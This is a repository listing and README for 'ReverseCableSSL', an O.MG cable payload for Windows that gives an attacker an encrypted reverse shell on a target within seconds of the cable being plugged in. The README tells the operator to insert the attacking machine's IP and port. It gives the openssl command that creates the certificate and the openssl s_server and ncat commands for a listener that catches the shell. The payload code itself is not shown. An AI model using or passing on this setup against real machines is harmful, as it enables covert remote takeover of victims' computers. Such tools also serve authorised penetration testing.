omg-payloads/payloads/library/remote_access/ReverseCableSSL
0iphor13 a477bcea47
Update README.md
2022-04-11 12:14:16 +02:00
..
CreateCert.png added pictures 2022-04-08 19:04:40 +02:00
README.md Update README.md 2022-04-11 12:14:16 +02:00
StartScreen.jpg added pictures 2022-04-08 19:04:40 +02:00
payload.txt Uploaded ReverseCableSSL 2022-04-08 18:34:40 +02:00

README.md

Title: ReverseCableSSL

Author: 0iphor13
OS: Windows
Version: 1.0
Requirements: OMG Firmware v.2.5 or higher

What is ReverseCableSSL?

ReverseCableSSL gets you remote access to your target in seconds.
Unlike ReverseCable, ReverseCableSSL offers encrypted traffic via OpenSSL.

Instruction:

!!!Insert the IP of your attacking machine & PORT into the payload at the beginning!!!
1. Create key.pem & cert.pem like so:
> openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
It will ask for information about the certificate - Insert whatever you want.

  1. For catching the shell you need to start a listener, which supports encrypted traffic.
    I recommend openssl itself or ncat - Example syntax for both:

    openssl s_server -quiet -key key.pem -cert cert.pem -port [Port Number]
    ncat --listen -p [Port Number] --ssl --ssl-cert cert.pem --ssl-key key.pem

  2. Plug in Cable.

alt text alt text